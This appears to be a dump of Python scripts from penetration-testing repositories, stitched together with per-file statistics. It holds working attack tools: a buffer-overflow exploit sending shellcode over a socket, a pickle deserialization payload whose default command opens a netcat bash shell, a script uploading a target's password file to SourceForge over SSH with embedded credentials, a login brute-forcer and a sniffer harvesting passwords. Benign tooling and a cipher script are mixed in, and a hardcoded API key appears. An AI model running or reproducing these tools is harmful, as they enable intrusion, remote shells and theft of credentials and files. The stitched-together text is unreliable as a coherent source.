e6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
pay+=shellcode
pay+='>\r\n\r\n'
print pay
sock.send(pay)
data = sock.recv(80960)
print data
sock.close
| 131.956522 | 2,183 | 0.77547 |
cybersecurity-penetration-testing | #Linear Conruential Generator reverse from known mod, multiplier and increment + final 2 chars of each random value
#Replace hardcode numbers with known numbers
print "Starting attempt to brute"
for i in range(100000, 99999999):
a = str((1664525 * int(str(i)+'00') + 1013904223) % 2**31)
if a[-2:] == "47":
b = str((1664525 * int(a) + 1013904223) % 2**31)
if b[-2:] == "46":
c = str((1664525 * int(b) + 1013904223) % 2**31)
if c[-2:] == "57":
d = str((1664525 * int(c) + 1013904223) % 2**31)
if d[-2:] == "56":
e = str((1664525 * int(d) + 1013904223) % 2**31)
if e[-2:] == "07":
f = str((1664525 * int(e) + 1013904223) % 2**31)
if f[-2:] == "38":
g = str((1664525 * int(f) + 1013904223) % 2**31)
if g[-2:] == "81":
h = str((1664525 * int(g) + 1013904223) % 2**31)
if h[-2:] == "32":
j = str((1664525 * int(h) + 1013904223) % 2**31)
if j[-2:] == "19":
k = str((1664525 * int(j) + 1013904223) % 2**31)
if k[-2:] == "70":
l = str((1664525 * int(k) + 1013904223) % 2**31)
if l[-2:] == "53":
print "potential number found: "+l
print "next 9 values are:"
for i in range(1, 10):
l = str((1664525 * int(l) + 1013904223) % 2**31)
print l[-2:] | 38.060606 | 115 | 0.51087 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/env python
# -*- coding: utf-8 -*-
misp_url = 'http://127.0.0.1/'
misp_key = '0O4Nt6Cjgk9nkPdVennsA6axsYIgdRvf2FQYY5lx'
misp_verifycert = False
| 21.428571 | 53 | 0.692308 |
Python-Penetration-Testing-for-Developers | print"<MaltegoMessage>"
print"<MaltegoTransformResponseMessage>"
print" <Entities>"
def maltego(entity, value, addvalues):
print" <Entity Type=\"maltego."+entity+"\">"
print" <Value>"+value+"</Value>"
print" <AdditionalFields>"
for value, item in addvalues.iteritems():
print" <Field Name=\""+value+"\" DisplayName=\""+value+"\" MatchingRule=\"strict\">"+item+"</Field>"
print" </AdditionalFields>"
print" </Entity>"
maltego("ip", "127.0.0.1", {"domain": "google.com"})
print" </Entities>"
print"</MaltegoTransformResponseMessage>"
print"</MaltegoMessage>"
| 24.347826 | 104 | 0.671821 |
owtf | """
tests.functional.plugins.web.active.test_web_active
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from tests.owtftest import OWTFCliWebPluginTestCase
class OWTFCliWebActivePluginTest(OWTFCliWebPluginTestCase):
categories = ["plugins", "web", "active"]
def test_web_active_wvs_001(self):
"""Test OWTF web active WVS 001 plugin."""
self.run_owtf(
"-o",
"OWTF-WVS-001",
"-t",
"active",
"%s://%s:%s" % (self.PROTOCOL, self.IP, self.PORT),
)
self.assert_is_in_logs(
"1 - Target: %s://%s:%s -> Plugin: Arachni Unauthenticated (web/active)"
% (self.PROTOCOL, self.IP, self.PORT),
name="Worker",
msg="Arachni web active plugin should have been run!",
)
self.assert_is_in_logs(
"Execution Start Date/Time:",
name="Worker",
msg="Arachni web active plugin should have been started!",
)
# Test arachni didn't raise an error
self.assert_is_not_in_logs(
"unrecognized option",
name="Worker",
msg="An error occured when running Arachni web active plugin!",
)
# Test no other plugin has been run.
self.assert_is_not_in_logs(
"2 - Target:", name="Worker", msg="No other plugins should have been run!"
)
# Test OWTF exited cleanly.
self.assert_is_in_logs(
"All jobs have been done. Exiting.",
name="MainProcess",
msg="OWTF did not finish properly!",
)
def test_web_active_wvs_006(self):
"""Test OWTF web active WVS 006 plugin."""
self.run_owtf(
"-o",
"OWTF-WVS-006",
"-t",
"active",
"%s://%s:%s" % (self.PROTOCOL, self.IP, self.PORT),
)
# Test Skipfish went OK.
self.assert_is_in_logs(
"1 - Target: %s://%s:%s -> Plugin: Skipfish Unauthenticated (web/active)"
% (self.PROTOCOL, self.IP, self.PORT),
name="Worker",
msg="Skipfish web active plugin should have been run!",
)
self.assert_is_in_logs(
"Execution Start Date/Time:",
name="Worker",
msg="Skipfish web active plugin should have been started!",
)
self.assert_is_in_logs(
"This was a great day for science!",
name="Worker",
msg="Skipfish did not finish properly!",
)
# Test no other plugin has been run.
self.assert_is_not_in_logs(
"2 - Target:", name="Worker", msg="No other plugins should have been run!"
)
# Test OWTF exited cleanly.
self.assert_is_in_logs(
"All jobs have been done. Exiting.",
name="MainProcess",
msg="OWTF did not finish properly!",
)
| 33.174419 | 86 | 0.517699 |
cybersecurity-penetration-testing | import urllib2
import json
GOOGLE_API_KEY = "{Insert your Google API key}"
target = "packtpub.com"
api_response = urllib2.urlopen("https://www.googleapis.com/plus/v1/people?query="+target+"&key="+GOOGLE_API_KEY).read()
json_response = json.loads(api_response)
for result in json_response['items']:
name = result['displayName']
print name
image = result['image']['url'].split('?')[0]
f = open(name+'.jpg','wb+')
f.write(urllib2.urlopen(image).read())
f.close()
| 30 | 120 | 0.658586 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import os
import sys
import base64
DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND
class PickleRce(object):
def __reduce__(self):
return (os.system,(COMMAND,))
print base64.b64encode(cPickle.dumps(PickleRce()))
| 22 | 64 | 0.711618 |
Python-for-Offensive-PenTest | '''
Caution
--------
Using this script for any malicious purpose is prohibited and against the law. Please read SourceForge terms and conditions carefully.
Use it on your own risk.
'''
# Python For Offensive PenTest
# Source Forge Docs
# http://sourceforge.net/p/forge/documentation/File%20Management/
# https://sourceforge.net/p/forge/documentation/SCP/
# Pycrypto: pycrypto-2.6.win32-py2.7
# Download link: http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Interacting with Source Forge
import paramiko # pip install paramiko
import scp # download link: https://pypi.python.org/pypi/scp
ssh_client = paramiko.SSHClient() # creating an ssh_client instance using paramiko sshclient class
'''
when you connect to an ssh server at the first time, if the ssh server keys are not stores on the client side, you will get a warning
message syaing that the server keys are not chached in the system and will promopt whether you want to accecpt those keys.
since we do an automation on the target side, we inform paramiko to accept these keys for the first time without interrupting the session or
prompting the user and this done via > set_missing_host_key_policy(paramiko.AutoAddPolicy()
'''
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect("web.sourceforge.net", username="hkhrais", password="[123justyouandme]") #Authenticate ourselves to the sourceforge server
print '[+] Authenticating against web.sourceforge.net ...' #please use your own login credentials :D
scp = scp.SCPClient(ssh_client.get_transport()) #after a sucessful authentication the ssh session id will be passed into SCPClient function
scp.put('C:/Users/Hussam/Desktop/password.txt') # upload to file( in this case it's password.txt) that we want to grab from the target to /root directroy
print '[+] File is uploaded '
scp.close()
print '[+] Closing the socket'
| 30.095238 | 153 | 0.743105 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from anonBrowser import *
from BeautifulSoup import BeautifulSoup
import os
import optparse
def mirrorImages(url, dir):
ab = anonBrowser()
ab.anonymize()
html = ab.open(url)
soup = BeautifulSoup(html)
image_tags = soup.findAll('img')
for image in image_tags:
filename = image['src'].lstrip('http://')
filename = os.path.join(dir,\
filename.replace('/', '_'))
print '[+] Saving ' + str(filename)
data = ab.open(image['src']).read()
ab.back()
save = open(filename, 'wb')
save.write(data)
save.close()
def main():
parser = optparse.OptionParser('usage %prog '+\
'-u <target url> -d <destination directory>')
parser.add_option('-u', dest='tgtURL', type='string',\
help='specify target url')
parser.add_option('-d', dest='dir', type='string',\
help='specify destination directory')
(options, args) = parser.parse_args()
url = options.tgtURL
dir = options.dir
if url == None or dir == None:
print parser.usage
exit(0)
else:
try:
mirrorImages(url, dir)
except Exception, e:
print '[-] Error Mirroring Images.'
print '[-] ' + str(e)
if __name__ == '__main__':
main()
| 22.034483 | 58 | 0.561798 |
cybersecurity-penetration-testing | # Vigenere Cipher (Polyalphabetic Substitution Cipher)
# http://inventwithpython.com/hacking (BSD Licensed)
import pyperclip
LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def main():
# This text can be copy/pasted from http://invpy.com/vigenereCipher.py
myMessage = """Alan Mathison Turing was a British mathematician, logician, cryptanalyst, and computer scientist. He was highly influential in the development of computer science, providing a formalisation of the concepts of "algorithm" and "computation" with the Turing machine. Turing is widely considered to be the father of computer science and artificial intelligence. During World War II, Turing worked for the Government Code and Cypher School (GCCS) at Bletchley Park, Britain's codebreaking centre. For a time he was head of Hut 8, the section responsible for German naval cryptanalysis. He devised a number of techniques for breaking German ciphers, including the method of the bombe, an electromechanical machine that could find settings for the Enigma machine. After the war he worked at the National Physical Laboratory, where he created one of the first designs for a stored-program computer, the ACE. In 1948 Turing joined Max Newman's Computing Laboratory at Manchester University, where he assisted in the development of the Manchester computers and became interested in mathematical biology. He wrote a paper on the chemical basis of morphogenesis, and predicted oscillating chemical reactions such as the Belousov-Zhabotinsky reaction, which were first observed in the 1960s. Turing's homosexuality resulted in a criminal prosecution in 1952, when homosexual acts were still illegal in the United Kingdom. He accepted treatment with female hormones (chemical castration) as an alternative to prison. Turing died in 1954, just over two weeks before his 42nd birthday, from cyanide poisoning. An inquest determined that his death was suicide; his mother and some others believed his death was accidental. On 10 September 2009, following an Internet campaign, British Prime Minister Gordon Brown made an official public apology on behalf of the British government for "the appalling way he was treated." As of May 2012 a private member's bill was before the House of Lords which would grant Turing a statutory pardon if enacted."""
myKey = 'ASIMOV'
myMode = 'encrypt' # set to 'encrypt' or 'decrypt'
if myMode == 'encrypt':
translated = encryptMessage(myKey, myMessage)
elif myMode == 'decrypt':
translated = decryptMessage(myKey, myMessage)
print('%sed message:' % (myMode.title()))
print(translated)
pyperclip.copy(translated)
print()
print('The message has been copied to the clipboard.')
def encryptMessage(key, message):
return translateMessage(key, message, 'encrypt')
def decryptMessage(key, message):
return translateMessage(key, message, 'decrypt')
def translateMessage(key, message, mode):
translated = [] # stores the encrypted/decrypted message string
keyIndex = 0
key = key.upper()
for symbol in message: # loop through each character in message
num = LETTERS.find(symbol.upper())
if num != -1: # -1 means symbol.upper() was not found in LETTERS
if mode == 'encrypt':
num += LETTERS.find(key[keyIndex]) # add if encrypting
elif mode == 'decrypt':
num -= LETTERS.find(key[keyIndex]) # subtract if decrypting
num %= len(LETTERS) # handle the potential wrap-around
# add the encrypted/decrypted symbol to the end of translated.
if symbol.isupper():
translated.append(LETTERS[num])
elif symbol.islower():
translated.append(LETTERS[num].lower())
keyIndex += 1 # move to the next letter in the key
if keyIndex == len(key):
keyIndex = 0
else:
# The symbol was not in LETTERS, so add it to translated as is.
translated.append(symbol)
return ''.join(translated)
# If vigenereCipher.py is run (instead of imported as a module) call
# the main() function.
if __name__ == '__main__':
main() | 60.695652 | 2,051 | 0.709821 |
owtf | """
Plugin for probing ftp
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = " FTP Probing "
def run(PluginInfo):
resource = get_resources("BruteFtpProbeMethods")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 22.071429 | 88 | 0.745342 |
cybersecurity-penetration-testing | import requests
from requests.auth import HTTPBasicAuth
with open('passwords.txt') as passwords:
for pass in passwords.readlines():
r = requests.get('http://packtpub.com/login', auth=HTTPBasicAuth('user', pass, allow_redirects=False)
if r.status_code == 301 and 'login' not in r.headers['location']:
print 'Login successful, password:', pass
break | 42.666667 | 109 | 0.67602 |
Python-Penetration-Testing-Cookbook | from urllib.request import urlopen
from xml.etree.ElementTree import parse
url = urlopen('http://feeds.feedburner.com/TechCrunch/Google')
xmldoc = parse(url)
xmldoc.write('output.xml')
for item in xmldoc.iterfind('channel/item'):
title = item.findtext('title')
desc = item.findtext('description')
date = item.findtext('pubDate')
link = item.findtext('link')
print(title)
print(desc)
print(date)
print(link)
print('---------')
| 24.833333 | 62 | 0.676724 |
hackipy | #!/usr/bin/python3
try:
print("[>] Importing modules")
import scapy.all as scapy
import scapy.layers.http as http
import argparse
except ModuleNotFoundError:
print("[!] Missing required modules, Exiting...")
exit()
else:
print("[>] Modules successfully imported")
print() # Just a line break
########################################################################
# User Defined Functions
########################################################################
def do_nothing():
"""This function does nothing ;)"""
pass
def get_arguments():
"""This function will get arguments from command line"""
parser = argparse.ArgumentParser(description="All arguments are optional")
parser.add_argument("-i","--interface",help="Interface to sniff on",dest="interface")
parser.add_argument("-s","--silent",help="Show less output",action="store_true",dest='mute')
options = parser.parse_args()
return options.interface,options.mute
def is_root():
"""This function will check whether the script was run as root or not"""
current_user_id = int(subprocess.check_output(["id","-u"]))
if current_user_id == 0:
return True
else:
return False
def get_default_interface():
"""This function will return default interface"""
default_routing_table = str(subprocess.check_output(["route","|","grep","default"],shell=True))
default_interface = re.search("[lawethn]{3,4}[\d]{1,2}",default_routing_table)
return default_interface[0]
def sniff(interface):
"""This function will sniff packets on provided interface
and call process_packet function to filter and display
the result"""
print("[>] Sniffing started, Capturing interesting packets\n")
scapy.sniff(iface=interface,store=False,prn=process_packet)
def process_packet(packet):
"""This function will process the packets sniffed by sniff function
It will filter specific packets and display specific info"""
# Check if packet has HTTP layer
if packet.haslayer(http.HTTPRequest):
# Extract the URL and print
url = extract_url(packet)
print(f"\n[+] URL >> {url}\n")
# Check further if it also has a Raw layer (which usually contains usernames and passwords sent in POST requests)
if packet.haslayer(scapy.Raw):
# Extract the Usernames and Password and print them
username_password_combination = extract_username_password(packet)
if username_password_combination:
print(f"\n\n[+] Possible Username Password Combination >> {username_password_combination}\n\n")
# Checking for DNS layer
if packet.haslayer(scapy.DNSQR):
# Extract the DNS request
dns_request = extract_dns_requests(packet)
if dns_request:
print(f"[+] DNS Request >> {dns_request}")
def extract_url(packet):
"""This function will extract and return the URL from the HTTP layer
It is called by process_packet when he (F for grammar) encounters a packet
with HTTP layer"""
hostname = packet[http.HTTPRequest].Host
path = packet[http.HTTPRequest].Path
url = str(hostname + path)
return url[2:-1] # As the string is converted from byte-size string
def extract_username_password(packet):
"""This function will extract the usernames and passwords from
the packet Raw layer if there are any and return them"""
load_field_content = str(packet[scapy.Raw].load)
load_field_content = load_field_content[2:-1]
# Search for each keyword from the keywords list in Raw field and return if found any
for keyword in keywords:
if keyword in load_field_content:
return load_field_content
def extract_dns_requests(packet):
"""This function will filter the DNS requests from the packet"""
#Extracting the DNS request
qname = str(packet[scapy.DNSQR].qname)
qname = qname[2:-1]
# Checking whether it is duplicate or not
if not qname in dns_packets:
dns_packets.append(qname)
return qname
else:
return None
########################################################################
# The main function
########################################################################
# Some important variables
keywords = [
"user","username","usr","name","usrname","uname",
"password","pass","passwd","passwrd"
]
dns_packets = []
# Processing arguments
interface, mute = get_arguments()
if not interface:
print("[-] Interface not provided, selecting default interface") if not mute else do_nothing()
interface = get_default_interface()
# Checking for sufficient privileges
if is_root():
do_nothing()
else:
print("[!] Please run the script as root")
exit()
# Pre-reporting
print(f"[>] Interface is set to {interface}") if not mute else do_nothing()
print(f"\n[+] Starting sniffing") if not mute else do_nothing()
# Starting the sniffing
sniff(interface) # It ain't much but it's honest work (Well, it isn't)
# Stopping the sniffing
print()
print("[+] Stopping sniffing") if not mute else do_nothing()
print("[+] Exiting...") | 30.853659 | 121 | 0.630863 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalAdminInterfaces")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 27.909091 | 75 | 0.782334 |
Python-Penetration-Testing-for-Developers | from scapy.all import *
ip1 = IP(src="192.168.0.10", dst ="192.168.0.11" )
tcp1 = TCP(sport =1024, dport=80, flags="S", seq=12345)
packet = ip1/tcp1
p =sr1(packet, inter=1)
p.show()
rs1 = TCP(sport =1024, dport=80, flags="R", seq=12347)
packet1=ip1/rs1
p1 = sr1(packet1)
p1.show
| 20.692308 | 55 | 0.658363 |
cybersecurity-penetration-testing | import mechanize, cookielib, random
class anonBrowser(mechanize.Browser):
def __init__(self, proxies = [], user_agents = []):
mechanize.Browser.__init__(self)
self.set_handle_robots(False)
self.proxies = proxies
self.user_agents = user_agents + ['Mozilla/4.0 ',\
'FireFox/6.01','ExactSearch', 'Nokia7110/1.0']
self.cookie_jar = cookielib.LWPCookieJar()
self.set_cookiejar(self.cookie_jar)
self.anonymize()
def clear_cookies(self):
self.cookie_jar = cookielib.LWPCookieJar()
self.set_cookiejar(self.cookie_jar)
def change_user_agent(self):
index = random.randrange(0, len(self.user_agents) )
self.addheaders = [('User-agent', \
( self.user_agents[index] ))]
def change_proxy(self):
if self.proxies:
index = random.randrange(0, len(self.proxies))
self.set_proxies( {'http': self.proxies[index]} )
def anonymize(self, sleep = False):
self.clear_cookies()
self.change_user_agent()
self.change_proxy()
if sleep:
time.sleep(60)
| 30.105263 | 61 | 0.57155 |
owtf | """
GREP Plugin for CORS
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Searches transaction DB for Cross Origin Resource Sharing headers"
def run(PluginInfo):
title = "This plugin looks for HTML 5 Cross Origin Resource Sharing (CORS) headers<br/>"
Content = plugin_helper.HtmlString(title)
Content += plugin_helper.FindResponseHeaderMatchesForRegexpName("HEADERS_FOR_CORS")
Content += plugin_helper.FindResponseHeaderMatchesForRegexpName(
"HEADERS_REGEXP_FOR_CORS_METHODS"
)
return Content
| 34.333333 | 92 | 0.759055 |
cybersecurity-penetration-testing | def addNumbers(a, b):
return a + b
spam = addNumbers(2, 40)
print(spam) | 15.2 | 25 | 0.6125 |
owtf | """
owtf.shell.base
~~~~~~~~~~~~~~~
The shell module allows running arbitrary shell commands and is critical to the framework
in order to run third party tools
"""
import logging
import os
import signal
import subprocess
from collections import defaultdict
from sqlalchemy.exc import SQLAlchemyError
from owtf.managers.target import target_manager, command_already_registered
from owtf.models.command import Command
from owtf.settings import INBOUND_PROXY_IP, INBOUND_PROXY_PORT, USER_AGENT
from owtf.utils.error import user_abort
from owtf.utils.strings import multi_replace_dict, scrub_output
from owtf.utils.timer import timer
__all__ = ["shell"]
class BaseShell(object):
def __init__(self):
# Some settings like the plugin output dir are dynamic, config is no place for those
self.dynamic_replacements = {}
self.timer = timer
self.command_time_offset = "Command"
self.old_cmds = defaultdict(list)
# Environment variables for shell
self.shell_env = os.environ.copy()
def refresh_replacements(self):
"""Refresh the replaced items in the list
:return: None
:rtype: None
"""
self.dynamic_replacements["###plugin_output_dir###"] = target_manager.get_path(
"plugin_output_dir"
)
def start_cmd(self, original_cmd, modified_cmd):
"""Start the timer and return the list of commands to run
:param original_cmd: Original command
:type original_cmd: `str`
:param modified_cmd: Modified command to run
:type modified_cmd: `str`
:return: Dict of commands and start time
:rtype: `dict`
"""
if original_cmd == modified_cmd and modified_cmd in self.old_cmds:
# Restore original command saved at modification time
original_cmd = self.old_cmds[modified_cmd]
self.timer.start_timer(self.command_time_offset)
commands = {
"OriginalCommand": original_cmd,
"ModifiedCommand": modified_cmd,
"Start": self.timer.get_start_date_time(self.command_time_offset),
}
return commands
def finish_cmd(self, session, cmd_info, was_cancelled, plugin_info):
"""Finish the command run
:param cmd_info: Command info dict
:type cmd_info: `dict`
:param was_cancelled: If cancelled by user, then true
:type was_cancelled: `bool`
:param plugin_info: Plugin context information
:type plugin_info: `dict`
:return: None
:rtype: None
"""
cmd_info["End"] = self.timer.get_end_date_time(self.command_time_offset)
success = True
if was_cancelled:
success = False
cmd_info["Success"] = success
cmd_info["RunTime"] = self.timer.get_elapsed_time_as_str(
self.command_time_offset
)
cmd_info["Target"] = target_manager.get_target_id
cmd_info["PluginKey"] = plugin_info["key"]
Command.add_cmd(session=session, command=cmd_info)
def escape_shell_path(self, text):
"""Escape shell path characters in the text
:param text: text to be escaped
:type text: `str`
:return: Modified text
:rtype: `str`
"""
return multi_replace_dict(text, {" ": "\ ", "(": "\(", ")": "\)"})
def get_modified_shell_cmd(self, command, plugin_output_dir):
"""Returns the modified shell command to run
:param command: Command to run
:type command: `str`
:param plugin_output_dir: Path to the plugin output directory
:type plugin_output_dir: `str`
:return: Modified command
:rtype: `str`
"""
self.refresh_replacements()
new_cmd = "cd {};{}".format(
self.escape_shell_path(plugin_output_dir),
multi_replace_dict(command, self.dynamic_replacements),
)
new_cmd = multi_replace_dict(
new_cmd,
{
"@@@USER_AGENT@@@": USER_AGENT,
"@@@INBOUND_PROXY_IP@@@": INBOUND_PROXY_IP,
"@@@INBOUND_PROXY_PORT@@@": INBOUND_PROXY_PORT,
},
)
self.old_cmds[new_cmd] = command
return new_cmd
def can_run_cmd(self, session, command):
"""Check if command is already in place to run
:param command: Command dict to check
:type command: `dict`
:return: List of return values
:rtype: `list`
"""
target = command_already_registered(
session=session, original_command=command["OriginalCommand"]
)
if target: # target_config will be None for a not found match
return [target, False]
return [None, True]
def create_subprocess(self, command):
"""Create a subprocess for the command to run
:param command: Command to run
:type command: `str`
:return:
:rtype:
"""
# Add proxy settings to environment variables so that tools can pick it up proxification, because these
# variables are set for every command that is run
# http://stackoverflow.com/questions/4789837/how-to-terminate-a-python-subprocess-launched-with-shell-true/4791612#4791612)
proc = subprocess.Popen(
command,
shell=True,
env=self.shell_env,
preexec_fn=os.setsid,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
bufsize=1,
)
return proc
def shell_exec_monitor(self, session, command, plugin_info):
"""Monitor shell command execution
:param command: Command to run
:type command: `str`
:param plugin_info: Plugin context info
:type plugin_info: `dict`
:return: Scrubbed output from the command
:rtype: `str`
"""
cmd_info = self.start_cmd(command, command)
target, can_run = self.can_run_cmd(session=session, command=cmd_info)
if not can_run:
message = "The command was already run for target: {!s}".format(target)
return message
logging.info("")
logging.info("Executing :\n\n%s\n\n", command)
logging.info(
"------> Execution Start Date/Time: %s",
self.timer.get_start_date_time_as_str("Command"),
)
logging.info("")
output = ""
cancelled = False
proc = None
try:
proc = self.create_subprocess(command)
while True:
line = proc.stdout.readline()
if not line:
break
logging.info(
line.decode("utf-8").strip()
) # Show progress on the screen too!
output += line.decode(
"utf-8"
) # Save as much output as possible before a tool crashes! :)
except KeyboardInterrupt:
os.killpg(proc.pid, signal.SIGINT)
out, err = proc.communicate()
logging.warn(out.decode("utf-8"))
output += out.decode("utf-8")
try:
os.killpg(
os.getpgid(proc.pid), signal.SIGTERM
) # Plugin KIA (Killed in Action)
except OSError:
pass # Plugin RIP (Rested In Peace)
cancelled = True
output += user_abort("Command", output) # Identify as Command Level abort
finally:
try:
self.finish_cmd(
session=session,
cmd_info=cmd_info,
was_cancelled=cancelled,
plugin_info=plugin_info,
)
except SQLAlchemyError as e:
logging.error(
"Exception occurred while during database transaction : \n%s",
str(e),
)
output += str(e)
return scrub_output(output)
def shell_exec(self, command, **kwargs):
"""This is mostly used for internal framework commands
.. note::
# Stolen from (added shell=True tweak, necessary for easy piping straight via the command line, etc):
# http://stackoverflow.com/questions/236737/making-a-system-call-that-returns-the-stdout-output-as-a-string/
# 236909#236909
:param command: Command to run
:type command: `str`
:param kwargs: Misc. args
:type kwds: `dict`
:return:
:rtype:
"""
kwargs.setdefault("stdout", subprocess.PIPE)
kwargs.setdefault("stderr", subprocess.STDOUT)
p = subprocess.Popen(command, shell=True, **kwargs)
return p.communicate()[0]
shell = BaseShell()
| 33.909091 | 131 | 0.572529 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Michael Spreitzenbarth (research@spreitzenbarth.de)
# Copyright (C) 2015 Daniel Arp (darp@gwdg.de)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re, urllib
from os.path import basename
from urlparse import urlparse
import numpy as np
from misc import get_file_hash
from xml.dom.minidom import parseString
from androguard.core.bytecodes import apk, dvm
from androguard.core.analysis.analysis import VMAnalysis
class StaticAPKAnalyzer():
# performs static analysis on given apk file
def __init__(self, output_format=None):
self._apk_data = dict()
self._a = None
self._d = None
self._dx = None
self._cm = None
self._strings = None
# set output parameters
categories = ['files',
'features',
'intent_filters',
'activities',
'req_permissions',
'used_permissions',
'api_calls',
'crypto_calls',
'net_calls',
'telephony_calls',
'suspicious_calls',
'dynamic_calls',
'native_calls',
'reflection_calls',
'urls',
'providers',
'receivers',
'services',
'libraries']
self._out = {'format': output_format,
'feat_len': 80,
'categories': categories}
def analyze(self, apk_file):
self._apk_data = dict()
self.__init_androguard_objects(apk_file)
self.__extract_features(apk_file)
def set_max_output_feat_len(self, feat_len):
# set maximal length of feature strings
self._out['feat_len'] = feat_len
def set_output_categories(self, categories):
# specify feature categories that should be printed, by default, all extracted features are written to output.
self._out['categories'] = categories
def __init_androguard_objects(self, apk_file):
self._a = apk.APK(apk_file)
self._d = dvm.DalvikVMFormat(self._a.get_dex())
self._dx = VMAnalysis(self._d)
self._cm = self._d.get_class_manager()
self._strings = self._d.get_strings()
def __extract_features(self, apk_file):
self.__calc_hashes(apk_file)
self.__extract_apk_obj_features()
# extract features from vm analysis object
used_perms_dict = self._dx.get_permissions([])
self._apk_data['used_permissions'] = used_perms_dict.keys()
for paths in used_perms_dict.values():
self.__extract_dx_features('api_calls', paths)
paths = self._dx.tainted_packages.search_crypto_packages()
self.__extract_dx_features('crypto_calls', paths)
paths = self._dx.tainted_packages.search_net_packages()
self.__extract_dx_features('net_calls', paths)
paths = self._dx.tainted_packages.search_telephony_packages()
self.__extract_dx_features('telephony_calls', paths)
paths = self._dx.get_tainted_packages().search_methods("Ldalvik/system/DexClassLoader;", ".", ".")
self.__extract_dx_features('dynamic_calls', paths)
paths = self._dx.get_tainted_packages().search_methods("Ljava/lang/reflect/Method;", ".", ".")
self.__extract_dx_features('reflection_calls', paths)
self.__extract_native_calls()
self.__extract_urls()
self.__extract_suspicious_calls()
def __calc_hashes(self, apk_file):
self._apk_data['md5'] = get_file_hash('md5', apk_file)
self._apk_data['sha256'] = get_file_hash('sha256', apk_file)
def __extract_apk_obj_features(self):
self._apk_data['apk_name'] = str(basename(self._a.get_filename()))
self._apk_data['package_name'] = str(self._a.get_package())
